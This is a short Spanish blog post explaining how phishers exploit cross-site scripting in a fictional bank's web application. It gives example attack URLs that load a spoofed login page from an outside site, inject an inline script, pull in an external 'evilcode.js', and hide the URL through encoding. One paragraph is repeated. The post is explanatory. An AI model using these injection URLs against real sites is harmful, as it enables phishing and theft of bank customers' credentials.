El ataque “Cross-Site scripting “(comúnmente referido a CSS o XSS) esta basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado. El problema es que normalmente no se valida correctamente. Esta vulnerabilidad puede estar presente de forma directa (foros, mensajes de error) o indirecta (redirecciones, framesets). Cada una se trata de forma diferente. En general, estas técnicas de CSS son el resultado de un desarrollo pobre de aplicaciones WEB.
Mientras hay numerosos vectores para el llevar al cabo un ataque de CSS, los Phishers pueden usar ataques de URL formateadas. Los formatos típicos para la inyección de CSS en URL válido incluyen:
Mientras hay numerosos vectores para el llevar al cabo un ataque de CSS, los Phishers pueden usar ataques de URL formateadas. Los formatos típicos para la inyección de CSS en URL válido incluyen:
i. La sustitución integra del protocolo de transferencia de hipertexto tal como:
“http://mibanco.com/ebanking?URL=http://sitio.com/fakepage.htm”
ii. Inline conteniendo código embebido, tal como:
“http://mibanco.com/ebanking?page=1&client=< script>sitiospoof...”
iii. Forzar la página para cargar código externo, tal como:
“http://mibanco.com/ebanking?page=1&response=malsitio.com%21evilcode.js&go=2”
Por ejemplo: se recibe en un correo electrónico de un Phishers la siguiente URL:
“http://mibanco.com/ebanking?URL=http://sitio.com//fakepage.htm”
Mientras el cliente es dirigido verdaderamente y es conectado a la aplicación verdadera del Web de MiBanco, debido a la mala codificación de la aplicación del banco, el componente de ebanking aceptará una URL arbitraria para la inserción del contenido de esa localización. Una vez insertado el código spoof dentro de la página, que podría ser el formulario de autenticación, el phisher ha logrado controlar una página dentro de un servidor externo (http://sitio.com//fakepage.htm).
Desgraciadamente, al igual que con la mayoría de las vulnerabilidades de CSS, el cliente no tiene manera de autentificar dicha página. Mientras que en el ejemplo la URL puede parecer obvia, el atacante la podría ofuscar fácilmente utilizando las técnicas explicadas anteriormente. Por ejemplo, http://stio.com/fakepage.htm puede ser:
“http%3A%2F%2F3515261219%C0%AEfakepage%2Ehtm”
No hay comentarios:
Publicar un comentario